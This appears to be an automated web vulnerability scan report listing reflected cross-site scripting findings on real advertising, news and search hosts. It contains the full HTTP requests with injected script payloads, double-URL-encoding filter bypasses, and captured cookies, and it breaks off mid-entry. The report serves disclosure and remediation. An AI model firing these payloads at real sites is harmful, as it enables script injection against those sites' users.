GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a40464"-alert(1)-"1a138402111 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:41:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9971a"-alert(1)-"2de8531fbc7 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ9971a"-alert(1)-"2de8531fbc7&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:41:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e9b2%2522%253balert%25281%2529%252f%252f370d1d97dd was submitted in the REST URL parameter 2. This input was echoed as 7e9b2";alert(1)//370d1d97dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313577e9b2%2522%253balert%25281%2529%252f%252f370d1d97dd/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:43:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1679
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d997%2522%253balert%25281%2529%252f%252fcb75c44487c was submitted in the REST URL parameter 3. This input was echoed as 4d997";alert(1)//cb75c44487c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x304d997%2522%253balert%25281%2529%252f%252fcb75c44487c/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:43:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a330d"-alert(1)-"69480e9465 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488a330d"-alert(1)-"69480e9465&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:35 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1679
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eec55"-alert(1)-"8b7e3018d80 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Geec55"-alert(1)-"8b7e3018d80&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:22 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73e81"-alert(1)-"7c3420db156 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!73e81"-alert(1)-"7c3420db156&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
5.154. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 987be"-alert(1)-"f02bf6e0775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a&987be"-alert(1)-"f02bf6e0775=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:42:33 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1683
5.155. http://alex-johnson.newsvine.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://alex-johnson.newsvine.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e2c2"-alert(1)-"4c5f2da1b50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?3e2c2"-alert(1)-"4c5f2da1b50=1 HTTP/1.1 Host: alex-johnson.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:50:14 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=325847da6769430ff5ec3a6f9466c9cb; expires=Sat, 25-Jan-2031 17:50:14 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 66745
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the &q request parameter is copied into the HTML document as plain text between tags. The payload 5f28f<img%20src%3da%20onerror%3dalert(1)>355803a5d5d was submitted in the &q parameter. This input was echoed as 5f28f<img src=a onerror=alert(1)>355803a5d5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 15eaa<img%20src%3da%20onerror%3dalert(1)>f5303b63731 was submitted in the q parameter. This input was echoed as 15eaa<img src=a onerror=alert(1)>f5303b63731 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /qsonhs.aspx?Form=&q=15eaa<img%20src%3da%20onerror%3dalert(1)>f5303b63731 HTTP/1.1 Host: api.bing.com Proxy-Connection: keep-alive Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHD=MS=1615147&SM=1&D=1594248&AF=MSNH14; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541
Response
HTTP/1.1 200 OK Content-Length: 79 Content-Type: application/json; charset=utf-8 X-Akamai-TestID: 6d6a25edd817430d9e5d8b7e0aeaabaa Date: Sun, 30 Jan 2011 14:48:40 GMT Connection: close
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 82d4a<script>alert(1)</script>e75189b7ac2 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction82d4a<script>alert(1)</script>e75189b7ac2&n=ar_int_p85001580&1296351015841 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296351006%2E909%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:40:23 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the AR_C request parameter is copied into the HTML document as plain text between tags. The payload 94aca<script>alert(1)</script>9dae726c61d was submitted in the AR_C parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=4040174094aca<script>alert(1)</script>9dae726c61d HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:40:22 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:22 2011&prad=58087454&arc=4040174094aca%3Cscript%3Ealert%281%29%3C%2Fscript%3E9dae726c61d&; expires=Sat 30-Apr-2011 01:40:22 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296351622; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26660
The value of the PRAd request parameter is copied into the HTML document as plain text between tags. The payload c39c3<script>alert(1)</script>10cf109dd00 was submitted in the PRAd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454c39c3<script>alert(1)</script>10cf109dd00&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:40:21 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:21 2011&prad=58087454c39c3%3Cscript%3Ealert%281%29%3C%2Fscript%3E10cf109dd00&arc=40401740&; expires=Sat 30-Apr-2011 01:40:21 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296351621; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26619
5.161. http://athima-chansanchai.newsvine.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://athima-chansanchai.newsvine.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a87ee"-alert(1)-"2c5f9f4d1a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?a87ee"-alert(1)-"2c5f9f4d1a4=1 HTTP/1.1 Host: athima-chansanchai.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:50:30 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=1d1d23b7294c7a0a950c54ae75d3a8dc; expires=Sat, 25-Jan-2031 17:50:30 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 73336
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 95074<script>alert(1)</script>d3dd0e1c31b was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=895074<script>alert(1)</script>d3dd0e1c31b&c2=6135404&c3=15&c4=13236&c5=&c6=&c10=3203787&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Feb 2011 01:40:59 GMT Date: Sun, 30 Jan 2011 01:40:59 GMT Connection: close Content-Length: 3594
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 675cf<script>alert(1)</script>5524e2a163a was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=13236&c5=&c6=&c10=3203787675cf<script>alert(1)</script>5524e2a163a&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
